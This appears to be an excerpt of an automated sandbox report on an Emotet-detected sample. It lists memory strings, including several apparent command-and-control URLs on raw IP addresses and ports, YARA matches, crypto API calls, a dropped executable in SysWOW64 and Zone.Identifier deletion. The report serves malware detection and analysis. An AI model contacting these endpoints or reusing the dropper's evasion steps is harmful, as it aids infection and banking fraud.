Source: svchost.exe, 0000000B.00000003.741257022.00000270E6B71000.00000004.00000001.sdmp	String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 0000000B.00000003.741257022.00000270E6B71000.00000004.00000001.sdmp	String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 0000000B.00000003.741257022.00000270E6B71000.00000004.00000001.sdmp	String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 0000000B.00000003.744431076.00000270E6B73000.00000004.00000001.sdmp	String found in binary or memory: t enough.\r\n\r\nSHARE WITH FRIENDS\r\nSend photos and videos to keep your close friends up to speed. Receive files for even more productivity.\r\n\r\n\r\nCalls are free over Wi-Fi but otherwise standard data charges apply.\r\nPrivacy Policy: https://www.facebook.com/about/privacy \| LEARN MORE at: https://messenger.com (https://messenger.com/)","ProductTitle":"Messenger","SearchTitles":[],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9WZDNCRF0083","Properties":{"PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","PackageIdentityName":"FACEBOOK.317180B0BB486","PublisherCertificateName":"CN=6E08453F-9BA7-4311-999C-D22FBA2FB1B8","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"c6a9fa5c-20a2-4e12-904d-edd408657dc8"},{"IdType":"LegacyWindowsPhoneProductId","Value":"3219d30d-4a23-4f58-a91c-c44b04e6a0c7"},{"IdType":"XboxTitleId","Value":"2004208728"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-06-18T23:36:16.7415859Z\|\|.\|\|68d5c39b-b63c-4bf8-a1a4-8ce696a01371\|\|1152921505693597400\|\|Null\|\|prerelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2021-06-18T23:35:29.3168730Z","LocalizedProperties":[{"SkuDescription":"Made for big screens and close connections. Get access to free texting, and high-quality voice & video chat built specifically for desktop.\r\n\r\nMADE FOR DESKTOP, MADE
Source: svchost.exe, 0000000B.00000003.744410269.00000270E6B83000.00000004.00000001.sdmp	String found in binary or memory: t enough.\r\n\r\nSHARE WITH FRIENDS\r\nSend photos and videos to keep your close friends up to speed. Receive files for even more productivity.\r\n\r\n\r\nCalls are free over Wi-Fi but otherwise standard data charges apply.\r\nPrivacy Policy: https://www.facebook.com/about/privacy \| LEARN MORE at: https://messenger.com (https://messenger.com/)","ProductTitle":"Messenger","SearchTitles":[],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9WZDNCRF0083","Properties":{"PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","PackageIdentityName":"FACEBOOK.317180B0BB486","PublisherCertificateName":"CN=6E08453F-9BA7-4311-999C-D22FBA2FB1B8","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"c6a9fa5c-20a2-4e12-904d-edd408657dc8"},{"IdType":"LegacyWindowsPhoneProductId","Value":"3219d30d-4a23-4f58-a91c-c44b04e6a0c7"},{"IdType":"XboxTitleId","Value":"2004208728"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-06-18T23:36:16.7415859Z\|\|.\|\|68d5c39b-b63c-4bf8-a1a4-8ce696a01371\|\|1152921505693597400\|\|Null\|\|prerelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2021-06-18T23:35:29.3168730Z","LocalizedProperties":[{"SkuDescription":"Made for big screens and close connections. Get access to free texting, and high-quality voice & video chat built specifically for desktop.\r\n\r\nMADE FOR DESKTOP, MADE F

Source: KBDHU1.exe, 00000005.00000003.819264277.000000000073D000.00000004.00000001.sdmp, KBDHU1.exe, 00000005.00000002.906600906.00000000032D0000.00000004.00000001.sdmp	String found in binary or memory: http://107.170.146.252:8080/yYXdTFdZ0/DfPFFYTbrJqLTvn/OUI1VCQMV00VFH/tItqVujt/djBiHrQbZlsTCQpMosu/bq
Source: KBDHU1.exe, 00000005.00000002.905885561.0000000000720000.00000004.00000020.sdmp, KBDHU1.exe, 00000005.00000002.906600906.00000000032D0000.00000004.00000001.sdmp	String found in binary or memory: http://167.114.153.111:8080/K5ZJo5zQ/HcfJcbQPbzw55g8/vSjTj/8XztFu/4uKa0U6RLsViXlFaMpW/
Source: KBDHU1.exe, 00000005.00000002.905885561.0000000000720000.00000004.00000020.sdmp	String found in binary or memory: http://167.114.153.111:8080/K5ZJo5zQ/HcfJcbQPbzw55g8/vSjTj/8XztFu/4uKa0U6RLsViXlFaMpW/(
Source: KBDHU1.exe, 00000005.00000002.905885561.0000000000720000.00000004.00000020.sdmp	String found in binary or memory: http://167.114.153.111:8080/K5ZJo5zQ/HcfJcbQPbzw55g8/vSjTj/8XztFu/4uKa0U6RLsViXlFaMpW//
Source: KBDHU1.exe, 00000005.00000002.905885561.0000000000720000.00000004.00000020.sdmp	String found in binary or memory: http://167.114.153.111:8080/K5ZJo5zQ/HcfJcbQPbzw55g8/vSjTj/8XztFu/4uKa0U6RLsViXlFaMpW/6
Source: KBDHU1.exe, 00000005.00000002.905885561.0000000000720000.00000004.00000020.sdmp	String found in binary or memory: http://167.114.153.111:8080/K5ZJo5zQ/HcfJcbQPbzw55g8/vSjTj/8XztFu/4uKa0U6RLsViXlFaMpW/K
Source: KBDHU1.exe, 00000005.00000002.905885561.0000000000720000.00000004.00000020.sdmp	String found in binary or memory: http://167.114.153.111:8080/K5ZJo5zQ/HcfJcbQPbzw55g8/vSjTj/8XztFu/4uKa0U6RLsViXlFaMpW/v
Source: KBDHU1.exe, 00000005.00000002.906773666.0000000003496000.00000004.00000001.sdmp, KBDHU1.exe, 00000005.00000002.905903392.000000000073B000.00000004.00000020.sdmp	String found in binary or memory: http://173.212.214.235:7080/hO5dkT/0EDa/Mr7phtrE381/twO6hvq/FJxtI0/
Source: KBDHU1.exe, 00000005.00000002.906773666.0000000003496000.00000004.00000001.sdmp	String found in binary or memory: http://173.212.214.235:7080/hO5dkT/0EDa/Mr7phtrE381/twO6hvq/FJxtI0//
Source: KBDHU1.exe, 00000005.00000002.905903392.000000000073B000.00000004.00000020.sdmp	String found in binary or memory: http://173.212.214.235:7080/hO5dkT/0EDa/Mr7phtrE381/twO6hvq/FJxtI0//tItqVujt/djBiHrQbZlsTCQpMosu/bqx
Source: KBDHU1.exe, 00000005.00000002.906773666.0000000003496000.00000004.00000001.sdmp	String found in binary or memory: http://173.212.214.235:7080/hO5dkT/0EDa/Mr7phtrE381/twO6hvq/FJxtI0/A:
Source: KBDHU1.exe, 00000005.00000002.906773666.0000000003496000.00000004.00000001.sdmp	String found in binary or memory: http://202.141.243.254:443/ZTcUlmgOk/ZdXDncN6R/
Source: KBDHU1.exe, 00000005.00000002.906773666.0000000003496000.00000004.00000001.sdmp	String found in binary or memory: http://202.141.243.254:443/ZTcUlmgOk/ZdXDncN6R/)5Z%
Source: KBDHU1.exe, 00000005.00000002.906773666.0000000003496000.00000004.00000001.sdmp	String found in binary or memory: http://202.141.243.254:443/ZTcUlmgOk/ZdXDncN6R/750%
Source: KBDHU1.exe, 00000005.00000002.906773666.0000000003496000.00000004.00000001.sdmp	String found in binary or memory: http://202.141.243.254:443/ZTcUlmgOk/ZdXDncN6R/x
Source: KBDHU1.exe, 00000005.00000002.906773666.0000000003496000.00000004.00000001.sdmp, KBDHU1.exe, 00000005.00000002.905903392.000000000073B000.00000004.00000020.sdmp	String found in binary or memory: http://75.143.247.51/8252jRzGZ1ESaMRhm/ZvhlIyMvd/AluncWtMpTGrO/1f9mgY7KN8T/YXKrl/nDV3S4P6PnM/
Source: KBDHU1.exe, 00000005.00000002.905903392.000000000073B000.00000004.00000020.sdmp	String found in binary or memory: http://75.143.247.51/8252jRzGZ1ESaMRhm/ZvhlIyMvd/AluncWtMpTGrO/1f9mgY7KN8T/YXKrl/nDV3S4P6PnM/)
Source: KBDHU1.exe, 00000005.00000002.906773666.0000000003496000.00000004.00000001.sdmp	String found in binary or memory: http://75.143.247.51/8252jRzGZ1ESaMRhm/ZvhlIyMvd/AluncWtMpTGrO/1f9mgY7KN8T/YXKrl/nDV3S4P6PnM/Q
Source: KBDHU1.exe, 00000005.00000002.905903392.000000000073B000.00000004.00000020.sdmp	String found in binary or memory: http://75.143.247.51/8252jRzGZ1ESaMRhm/ZvhlIyMvd/AluncWtMpTGrO/1f9mgY7KN8T/YXKrl/nDV3S4P6PnM/R
Source: KBDHU1.exe, 00000005.00000002.905903392.000000000073B000.00000004.00000020.sdmp	String found in binary or memory: http://75.143.247.51/8252jRzGZ1ESaMRhm/ZvhlIyMvd/AluncWtMpTGrO/1f9mgY7KN8T/YXKrl/nDV3S4P6PnM/V
Source: KBDHU1.exe, 00000005.00000002.906773666.0000000003496000.00000004.00000001.sdmp	String found in binary or memory: http://75.143.247.51/8252jRzGZ1ESaMRhm/ZvhlIyMvd/AluncWtMpTGrO/1f9mgY7KN8T/YXKrl/nDV3S4P6PnM/s
Source: KBDHU1.exe, 00000005.00000002.906773666.0000000003496000.00000004.00000001.sdmp	String found in binary or memory: http://75.143.247.51/8252jRzGZ1ESaMRhm/ZvhlIyMvd/AluncWtMpTGrO/1f9mgY7KN8T/YXKrl/nDV3S4P6PnM/v5s%
Source: KBDHU1.exe, 00000005.00000002.905885561.0000000000720000.00000004.00000020.sdmp, KBDHU1.exe, 00000005.00000003.819264277.000000000073D000.00000004.00000001.sdmp	String found in binary or memory: http://88.153.35.32/jGQKlmkSoBBnbOFUuBG/9vXEjmEP4GznF/
Source: KBDHU1.exe, 00000005.00000002.905885561.0000000000720000.00000004.00000020.sdmp	String found in binary or memory: http://88.153.35.32/jGQKlmkSoBBnbOFUuBG/9vXEjmEP4GznF/&
Source: svchost.exe, 0000000B.00000002.764897589.00000270E69F0000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: svchost.exe, 0000000B.00000002.764897589.00000270E69F0000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: svchost.exe, 0000000B.00000002.764897589.00000270E69F0000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: svchost.exe, 0000000B.00000002.764897589.00000270E69F0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: svchost.exe, 0000000B.00000003.750587188.00000270E6B79000.00000004.00000001.sdmp	String found in binary or memory: http://universalstore.streaming.mediaservices.windows.net/411ee20d-d1b8-4d57-ae3f-af22235d79d9/1f8e1
Source: svchost.exe, 0000000B.00000003.741257022.00000270E6B71000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 0000000B.00000003.741257022.00000270E6B71000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/termsofservice
Source: svchost.exe, 0000000B.00000002.764765099.00000270E64EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.microsoft.
Source: svchost.exe, 0000000B.00000003.750528544.00000270E6B94000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.750587188.00000270E6B79000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 0000000B.00000003.750574103.00000270E6B69000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 0000000B.00000003.750528544.00000270E6B94000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.750587188.00000270E6B79000.00000004.00000001.sdmp	String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: svchost.exe, 0000000B.00000003.741257022.00000270E6B71000.00000004.00000001.sdmp	String found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
Source: svchost.exe, 0000000B.00000003.750528544.00000270E6B94000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.750587188.00000270E6B79000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 0000000B.00000003.750528544.00000270E6B94000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.750587188.00000270E6B79000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/info/privacy

Source: unknown

Network traffic detected: HTTP traffic on port 49770 -> 443

Source: KBDHU1.exe, 00000005.00000002.905874375.000000000070A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 00000000.00000002.663798235.0000000002CC1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.716674491.00000000032E2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.906181296.0000000002341000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.658508716.0000000000602000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.906600906.00000000032D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.661246086.0000000000602000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0.3.boI88C399w.exe.62a3d0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.boI88C399w.exe.62a3d0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.boI88C399w.exe.2cc0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.KBDHU1.exe.32e32a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.boI88C399w.exe.62a3d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.KBDHU1.exe.32e32a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.KBDHU1.exe.32e32a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.KBDHU1.exe.2340000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.KBDHU1.exe.32e32a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.boI88C399w.exe.62a3d0.0.raw.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\mos\KBDHU1.exe

Code function: 5_2_02342650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,

5_2_02342650

Source: C:\Users\user\Desktop\boI88C399w.exe	Code function: 0_2_02CB01F0 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,		0_2_02CB01F0
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Code function: 5_2_022E01F0 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,		5_2_022E01F0

Source: C:\Users\user\Desktop\boI88C399w.exe

File created: C:\Windows\SysWOW64\mos\

Jump to behavior

Source: C:\Users\user\Desktop\boI88C399w.exe

File deleted: C:\Windows\SysWOW64\mos\KBDHU1.exe:Zone.Identifier

Jump to behavior

Source: C:\Users\user\Desktop\boI88C399w.exe	Code function: 0_2_00451D80	0_2_00451D80
Source: C:\Users\user\Desktop\boI88C399w.exe	Code function: 0_2_02CC8240	0_2_02CC8240
Source: C:\Users\user\Desktop\boI88C399w.exe	Code function: 0_2_02CC3BA0	0_2_02CC3BA0
Source: C:\Users\user\Desktop\boI88C399w.exe	Code function: 0_2_02CC7740	0_2_02CC7740
Source: C:\Users\user\Desktop\boI88C399w.exe	Code function: 0_2_02CC3F20	0_2_02CC3F20
Source: C:\Users\user\Desktop\boI88C399w.exe	Code function: 0_2_02CC1C70	0_2_02CC1C70
Source: C:\Users\user\Desktop\boI88C399w.exe	Code function: 0_2_02CC3D10	0_2_02CC3D10
Source: C:\Users\user\Desktop\boI88C399w.exe	Code function: 0_2_02CC6530	0_2_02CC6530
Source: C:\Windows\SysWOW64\mos\KBDHU1.exe	Code function: 5_2_02348240	5_2_02348240
